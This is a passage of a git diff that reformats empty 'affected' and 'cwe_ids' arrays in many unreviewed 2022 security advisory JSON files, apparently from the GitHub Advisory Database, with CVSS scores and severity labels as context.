b/advisories/unreviewed/2022/05/GHSA-mxpf-9v3v-24p5/GHSA-mxpf-9v3v-24p5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-p2gc-m983-v5x9/GHSA-p2gc-m983-v5x9.json b/advisories/unreviewed/2022/05/GHSA-p2gc-m983-v5x9/GHSA-p2gc-m983-v5x9.json index 55183e1a1ee..dbcca22ee9f 100644 --- a/advisories/unreviewed/2022/05/GHSA-p2gc-m983-v5x9/GHSA-p2gc-m983-v5x9.json +++ b/advisories/unreviewed/2022/05/GHSA-p2gc-m983-v5x9/GHSA-p2gc-m983-v5x9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-p58f-9w9q-26gq/GHSA-p58f-9w9q-26gq.json b/advisories/unreviewed/2022/05/GHSA-p58f-9w9q-26gq/GHSA-p58f-9w9q-26gq.json index 811749225d8..71decbda57c 100644 --- a/advisories/unreviewed/2022/05/GHSA-p58f-9w9q-26gq/GHSA-p58f-9w9q-26gq.json +++ b/advisories/unreviewed/2022/05/GHSA-p58f-9w9q-26gq/GHSA-p58f-9w9q-26gq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-p6hh-9ppc-p972/GHSA-p6hh-9ppc-p972.json b/advisories/unreviewed/2022/05/GHSA-p6hh-9ppc-p972/GHSA-p6hh-9ppc-p972.json index 54db0c83ba1..c1f85e901e0 100644 --- a/advisories/unreviewed/2022/05/GHSA-p6hh-9ppc-p972/GHSA-p6hh-9ppc-p972.json +++ b/advisories/unreviewed/2022/05/GHSA-p6hh-9ppc-p972/GHSA-p6hh-9ppc-p972.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-p937-qmq8-jqwg/GHSA-p937-qmq8-jqwg.json b/advisories/unreviewed/2022/05/GHSA-p937-qmq8-jqwg/GHSA-p937-qmq8-jqwg.json index e40ad6d21ac..cb262fd89f8 100644 --- a/advisories/unreviewed/2022/05/GHSA-p937-qmq8-jqwg/GHSA-p937-qmq8-jqwg.json +++ b/advisories/unreviewed/2022/05/GHSA-p937-qmq8-jqwg/GHSA-p937-qmq8-jqwg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-pg95-hjj5-gw29/GHSA-pg95-hjj5-gw29.json b/advisories/unreviewed/2022/05/GHSA-pg95-hjj5-gw29/GHSA-pg95-hjj5-gw29.json index 8e1b9ef436e..88cc085284f 100644 --- a/advisories/unreviewed/2022/05/GHSA-pg95-hjj5-gw29/GHSA-pg95-hjj5-gw29.json +++ b/advisories/unreviewed/2022/05/GHSA-pg95-hjj5-gw29/GHSA-pg95-hjj5-gw29.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pgcp-c398-67pq/GHSA-pgcp-c398-67pq.json b/advisories/unreviewed/2022/05/GHSA-pgcp-c398-67pq/GHSA-pgcp-c398-67pq.json index 392f5292b11..7b1e6f90e49 100644 --- a/advisories/unreviewed/2022/05/GHSA-pgcp-c398-67pq/GHSA-pgcp-c398-67pq.json +++ b/advisories/unreviewed/2022/05/GHSA-pgcp-c398-67pq/GHSA-pgcp-c398-67pq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-ph9v-cr87-52c5/GHSA-ph9v-cr87-52c5.json b/advisories/unreviewed/2022/05/GHSA-ph9v-cr87-52c5/GHSA-ph9v-cr87-52c5.json index c13cea3360a..b18dae03f3b 100644 --- a/advisories/unreviewed/2022/05/GHSA-ph9v-cr87-52c5/GHSA-ph9v-cr87-52c5.json +++ b/advisories/unreviewed/2022/05/GHSA-ph9v-cr87-52c5/GHSA-ph9v-cr87-52c5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-pjm7-rwqq-cwm2/GHSA-pjm7-rwqq-cwm2.json b/advisories/unreviewed/2022/05/GHSA-pjm7-rwqq-cwm2/GHSA-pjm7-rwqq-cwm2.json index e5274d54115..cc21b5c0842 100644 --- a/advisories/unreviewed/2022/05/GHSA-pjm7-rwqq-cwm2/GHSA-pjm7-rwqq-cwm2.json +++ b/advisories/unreviewed/2022/05/GHSA-pjm7-rwqq-cwm2/GHSA-pjm7-rwqq-cwm2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pjp8-5m83-vj58/GHSA-pjp8-5m83-vj58.json b/advisories/unreviewed/2022/05/GHSA-pjp8-5m83-vj58/GHSA-pjp8-5m83-vj58.json index f31e822f133..c0112727f87 100644 --- a/advisories/unreviewed/2022/05/GHSA-pjp8-5m83-vj58/GHSA-pjp8-5m83-vj58.json +++ b/advisories/unreviewed/2022/05/GHSA-pjp8-5m83-vj58/GHSA-pjp8-5m83-vj58.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-pmf4-xpgc-x9w3/GHSA-pmf4-xpgc-x9w3.json b/advisories/unreviewed/2022/05/GHSA-pmf4-xpgc-x9w3/GHSA-pmf4-xpgc-x9w3.json index b5e5b9fcfa9..42abcaea642 100644 --- a/advisories/unreviewed/2022/05/GHSA-pmf4-xpgc-x9w3/GHSA-pmf4-xpgc-x9w3.json +++ b/advisories/unreviewed/2022/05/GHSA-pmf4-xpgc-x9w3/GHSA-pmf4-xpgc-x9w3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-pq8f-25qp-57h9/GHSA-pq8f-25qp-57h9.json b/advisories/unreviewed/2022/05/GHSA-pq8f-25qp-57h9/GHSA-pq8f-25qp-57h9.json index 8c5f7d2c7c9..bb77e3bf049 100644 --- a/advisories/unreviewed/2022/05/GHSA-pq8f-25qp-57h9/GHSA-pq8f-25qp-57h9.json +++ b/advisories/unreviewed/2022/05/GHSA-pq8f-25qp-57h9/GHSA-pq8f-25qp-57h9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-pqg5-m5v9-4mx6/GHSA-pqg5-m5v9-4mx6.json b/advisories/unreviewed/2022/05/GHSA-pqg5-m5v9-4mx6/GHSA-pqg5-m5v9-4mx6.json index 7305a5e0a08..85b008217dd 100644 --- a/advisories/unreviewed/2022/05/GHSA-pqg5-m5v9-4mx6/GHSA-pqg5-m5v9-4mx6.json +++ b/advisories/unreviewed/2022/05/GHSA-pqg5-m5v9-4mx6/GHSA-pqg5-m5v9-4mx6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-pqqp-fwj9-923f/GHSA-pqqp-fwj9-923f.json b/advisories/unreviewed/2022/05/GHSA-pqqp-fwj9-923f/GHSA-pqqp-fwj9-923f.json index a1cacf89831..dd53c7a66c2 100644 --- a/advisories/unreviewed/2022/05/GHSA-pqqp-fwj9-923f/GHSA-pqqp-fwj9-923f.json +++ b/advisories/unreviewed/2022/05/GHSA-pqqp-fwj9-923f/GHSA-pqqp-fwj9-923f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-prcw-3cp4-4x63/GHSA-prcw-3cp4-4x63.json b/advisories/unreviewed/2022/05/GHSA-prcw-3cp4-4x63/GHSA-prcw-3cp4-4x63.json index 60ca6521fc2..b1242da903a 100644 --- a/advisories/unreviewed/2022/05/GHSA-prcw-3cp4-4x63/GHSA-prcw-3cp4-4x63.json +++ b/advisories/unreviewed/2022/05/GHSA-prcw-3cp4-4x63/GHSA-prcw-3cp4-4x63.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-pvgr-wf54-pxhq/GHSA-pvgr-wf54-pxhq.json b/advisories/unreviewed/2022/05/GHSA-pvgr-wf54-pxhq/GHSA-pvgr-wf54-pxhq.json index fa31ca5199c..c16d1656bcc 100644 --- a/advisories/unreviewed/2022/05/GHSA-pvgr-wf54-pxhq/GHSA-pvgr-wf54-pxhq.json +++ b/advisories/unreviewed/2022/05/GHSA-pvgr-wf54-pxhq/GHSA-pvgr-wf54-pxhq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pxw2-r89v-7v56/GHSA-pxw2-r89v-7v56.json b/advisories/unreviewed/2022/05/GHSA-pxw2-r89v-7v56/GHSA-pxw2-r89v-7v56.json index 556f90217b8..2bb14da1c15 100644 --- a/advisories/unreviewed/2022/05/GHSA-pxw2-r89v-7v56/GHSA-pxw2-r89v-7v56.json +++ b/advisories/unreviewed/2022/05/GHSA-pxw2-r89v-7v56/GHSA-pxw2-r89v-7v56.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-q25q-ppm5-qpv7/GHSA-q25q-ppm5-qpv7.json b/advisories/unreviewed/2022/05/GHSA-q25q-ppm5-qpv7/GHSA-q25q-ppm5-qpv7.json index 1ecf0e7746d..66feef66896 100644 --- a/advisories/unreviewed/2022/05/GHSA-q25q-ppm5-qpv7/GHSA-q25q-ppm5-qpv7.json +++ b/advisories/unreviewed/2022/05/GHSA-q25q-ppm5-qpv7/GHSA-q25q-ppm5-qpv7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-q293-6c69-chhm/GHSA-q293-6c69-chhm.json b/advisories/unreviewed/2022/05/GHSA-q293-6c69-chhm/GHSA-q293-6c69-chhm.json index 2506b843c50..e61128ef125 100644 --- a/advisories/unreviewed/2022/05/GHSA-q293-6c69-chhm/GHSA-q293-6c69-chhm.json +++ b/advisories/unreviewed/2022/05/GHSA-q293-6c69-chhm/GHSA-q293-6c69-chhm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-q366-jmr8-gq49/GHSA-q366-jmr8-gq49.json b/advisories/unreviewed/2022/05/GHSA-q366-jmr8-gq49/GHSA-q366-jmr8-gq49.json index 0d87dc36f58..103ef940c57 100644 --- a/advisories/unreviewed/2022/05/GHSA-q366-jmr8-gq49/GHSA-q366-jmr8-gq49.json +++ b/advisories/unreviewed/2022/05/GHSA-q366-jmr8-gq49/GHSA-q366-jmr8-gq49.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-q4vg-pwpq-j6r8/GHSA-q4vg-pwpq-j6r8.json b/advisories/unreviewed/2022/05/GHSA-q4vg-pwpq-j6r8/GHSA-q4vg-pwpq-j6r8.json index a451a7f9473..dd3a289a5b5 100644 --- a/advisories/unreviewed/2022/05/GHSA-q4vg-pwpq-j6r8/GHSA-q4vg-pwpq-j6r8.json +++ b/advisories/unreviewed/2022/05/GHSA-q4vg-pwpq-j6r8/GHSA-q4vg-pwpq-j6r8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-q654-j343-6r89/GHSA-q654-j343-6r89.json b/advisories/unreviewed/2022/05/GHSA-q654-j343-6r89/GHSA-q654-j343-6r89.json index e1b8d84b907..118b9e367cc 100644 --- a/advisories/unreviewed/2022/05/GHSA-q654-j343-6r89/GHSA-q654-j343-6r89.json +++ b/advisories/unreviewed/2022/05/GHSA-q654-j343-6r89/GHSA-q654-j343-6r89.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-q6jx-72qh-p7v2/GHSA-q6jx-72qh-p7v2.json b/advisories/unreviewed/2022/05/GHSA-q6jx-72qh-p7v2/GHSA-q6jx-72qh-p7v2.json index 4e4b7c104cf..5f26bbb6549 100644 --- a/advisories/unreviewed/2022/05/GHSA-q6jx-72qh-p7v2/GHSA-q6jx-72qh-p7v2.json +++ b/advisories/unreviewed/2022/05/GHSA-q6jx-72qh-p7v2/GHSA-q6jx-72qh-p7v2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-q76w-5489-5223/GHSA-q76w-5489-5223.json b/advisories/unreviewed/2022/05/GHSA-q76w-5489-5223/GHSA-q76w-5489-5223.json index 7ebf75c02da..3a12b0583cd 100644 --- a/advisories/unreviewed/2022/05/GHSA-q76w-5489-5223/GHSA-q76w-5489-5223.json +++ b/advisories/unreviewed/2022/05/GHSA-q76w-5489-5223/GHSA-q76w-5489-5223.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-q7xf-x96v-cjrh/GHSA-q7xf-x96v-cjrh.json b/advisories/unreviewed/2022/05/GHSA-q7xf-x96v-cjrh/GHSA-q7xf-x96v-cjrh.json index 0cfb27213c4..f473cd511d2 100644 --- a/advisories/unreviewed/2022/05/GHSA-q7xf-x96v-cjrh/GHSA-q7xf-x96v-cjrh.json +++ b/advisories/unreviewed/2022/05/GHSA-q7xf-x96v-cjrh/GHSA-q7xf-x96v-cjrh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-q89h-4w6v-56fc/GHSA-q89h-4w6v-56fc.json b/advisories/unreviewed/2022/05/GHSA-q89h-4w6v-56fc/GHSA-q89h-4w6v-56fc.json index fd3380229bd..50467a28f72 100644 --- a/advisories/unreviewed/2022/05/GHSA-q89h-4w6v-56fc/GHSA-q89h-4w6v-56fc.json +++ b/advisories/unreviewed/2022/05/GHSA-q89h-4w6v-56fc/GHSA-q89h-4w6v-56fc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-q9w5-hr49-h5h8/GHSA-q9w5-hr49-h5h8.json b/advisories/unreviewed/2022/05/GHSA-q9w5-hr49-h5h8/GHSA-q9w5-hr49-h5h8.json index 856ef8baf79..54b14362619 100644 --- a/advisories/unreviewed/2022/05/GHSA-q9w5-hr49-h5h8/GHSA-q9w5-hr49-h5h8.json +++ b/advisories/unreviewed/2022/05/GHSA-q9w5-hr49-h5h8/GHSA-q9w5-hr49-h5h8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qf43-62jc-r476/GHSA-qf43-62jc-r476.json b/advisories/unreviewed/2022/05/GHSA-qf43-62jc-r476/GHSA-qf43-62jc-r476.json index 11dc5e794a6..1a26b607950 100644 --- a/advisories/unreviewed/2022/05/GHSA-qf43-62jc-r476/GHSA-qf43-62jc-r476.json +++ b/advisories/unreviewed/2022/05/GHSA-qf43-62jc-r476/GHSA-qf43-62jc-r476.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-qgfh-gp2h-mw8x/GHSA-qgfh-gp2h-mw8x.json b/advisories/unreviewed/2022/05/GHSA-qgfh-gp2h-mw8x/GHSA-qgfh-gp2h-mw8x.json index b1e39faf113..e818124a417 100644 --- a/advisories/unreviewed/2022/05/GHSA-qgfh-gp2h-mw8x/GHSA-qgfh-gp2h-mw8x.json +++ b/advisories/unreviewed/2022/05/GHSA-qgfh-gp2h-mw8x/GHSA-qgfh-gp2h-mw8x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-qhfq-jc5x-c4c2/GHSA-qhfq-jc5x-c4c2.json b/advisories/unreviewed/2022/05/GHSA-qhfq-jc5x-c4c2/GHSA-qhfq-jc5x-c4c2.json index a5cf534fe10..2210023bca9 100644 --- a/advisories/unreviewed/2022/05/GHSA-qhfq-jc5x-c4c2/GHSA-qhfq-jc5x-c4c2.json +++ b/advisories/unreviewed/2022/05/GHSA-qhfq-jc5x-c4c2/GHSA-qhfq-jc5x-c4c2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-qhhh-p7xf-qmpx/GHSA-qhhh-p7xf-qmpx.json b/advisories/unreviewed/2022/05/GHSA-qhhh-p7xf-qmpx/GHSA-qhhh-p7xf-qmpx.json index 4e1cae63541..ddd339fa55c 100644 --- a/advisories/unreviewed/2022/05/GHSA-qhhh-p7xf-qmpx/GHSA-qhhh-p7xf-qmpx.json +++ b/advisories/unreviewed/2022/05/GHSA-qhhh-p7xf-qmpx/GHSA-qhhh-p7xf-qmpx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qhqg-4v5v-wwfm/GHSA-qhqg-4v5v-wwfm.json b/advisories/unreviewed/2022/05/GHSA-qhqg-4v5v-wwfm/GHSA-qhqg-4v5v-wwfm.json index 3900d5b251d..3b6dcfecdda 100644 --- a/advisories/unreviewed/2022/05/GHSA-qhqg-4v5v-wwfm/GHSA-qhqg-4v5v-wwfm.json +++ b/advisories/unreviewed/2022/05/GHSA-qhqg-4v5v-wwfm/GHSA-qhqg-4v5v-wwfm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qp2q-vm9j-4999/GHSA-qp2q-vm9j-4999.json b/advisories/unreviewed/2022/05/GHSA-qp2q-vm9j-4999/GHSA-qp2q-vm9j-4999.json index 617610908c8..951f4293350 100644 --- a/advisories/unreviewed/2022/05/GHSA-qp2q-vm9j-4999/GHSA-qp2q-vm9j-4999.json +++ b/advisories/unreviewed/2022/05/GHSA-qp2q-vm9j-4999/GHSA-qp2q-vm9j-4999.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qrgr-8hm8-vqcx/GHSA-qrgr-8hm8-vqcx.json b/advisories/unreviewed/2022/05/GHSA-qrgr-8hm8-vqcx/GHSA-qrgr-8hm8-vqcx.json index 48fb3bda98d..b3b010870e2 100644 --- a/advisories/unreviewed/2022/05/GHSA-qrgr-8hm8-vqcx/GHSA-qrgr-8hm8-vqcx.json +++ b/advisories/unreviewed/2022/05/GHSA-qrgr-8hm8-vqcx/GHSA-qrgr-8hm8-vqcx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-qrxh-qrgr-2433/GHSA-qrxh-qrgr-2433.json b/advisories/unreviewed/2022/05/GHSA-qrxh-qrgr-2433/GHSA-qrxh-qrgr-2433.json index b4266ed43d1..9900aff5fcf 100644 --- a/advisories/unreviewed/2022/05/GHSA-qrxh-qrgr-2433/GHSA-qrxh-qrgr-2433.json +++ b/advisories/unreviewed/2022/05/GHSA-qrxh-qrgr-2433/GHSA-qrxh-qrgr-2433.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qvxj-2777-cr7v/GHSA-qvxj-2777-cr7v.json b/advisories/unreviewed/2022/05/GHSA-qvxj-2777-cr7v/GHSA-qvxj-2777-cr7v.json index 283e4b29006..f7fed08c1f3 100644 --- a/advisories/unreviewed/2022/05/GHSA-qvxj-2777-cr7v/GHSA-qvxj-2777-cr7v.json +++ b/advisories/unreviewed/2022/05/GHSA-qvxj-2777-cr7v/GHSA-qvxj-2777-cr7v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-qwqg-rff2-45cw/GHSA-qwqg-rff2-45cw.json b/advisories/unreviewed/2022/05/GHSA-qwqg-rff2-45cw/GHSA-qwqg-rff2-45cw.json index 68935448570..6db70c702f8 100644 --- a/advisories/unreviewed/2022/05/GHSA-qwqg-rff2-45cw/GHSA-qwqg-rff2-45cw.json +++ b/advisories/unreviewed/2022/05/GHSA-qwqg-rff2-45cw/GHSA-qwqg-rff2-45cw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-r24c-c623-3935/GHSA-r24c-c623-3935.json b/advisories/unreviewed/2022/05/GHSA-r24c-c623-3935/GHSA-r24c-c623-3935.json index f72a5f636be..c7877b42945 100644 --- a/advisories/unreviewed/2022/05/GHSA-r24c-c623-3935/GHSA-r24c-c623-3935.json +++ b/advisories/unreviewed/2022/05/GHSA-r24c-c623-3935/GHSA-r24c-c623-3935.json @@ -13,9 +13,7 